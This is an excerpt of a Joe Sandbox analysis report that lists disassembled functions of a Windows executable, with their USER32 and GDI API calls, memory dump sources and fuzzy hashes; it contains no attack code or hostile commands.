                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1726766782-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e3e231889b9edf0f74221ee0072ea4e59d90ce0ad37bc94b8ebeee311f112aa0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3e231889b9edf0f74221ee0072ea4e59d90ce0ad37bc94b8ebeee311f112aa0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00441077 Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 642888154-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00449063 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                                                                                                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1976402638-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00442582 Relevance: 9.1, APIs: 6, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00442597
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 004425BF
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                                                                                                                                                                                                                                                                                                                                                                • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00442624
                                                                                                                                                                                                                                                                                                                                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4137160315-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00448851 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Enable$Show$MessageSend
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1871949834-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00449606 Relevance: 9.1, APIs: 6, Instructions: 91windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 0044961A
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0044964A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004496BA
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004496C7
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$_wcslen$_memset_wcspbrk
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1624073603-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004416D1 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045552E Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1640429340-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00467E5E Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __fileno__setmode$DebugOutputString_fprintf
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3354276064-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00455080 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 752480666-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00455212 Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 0045527A
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
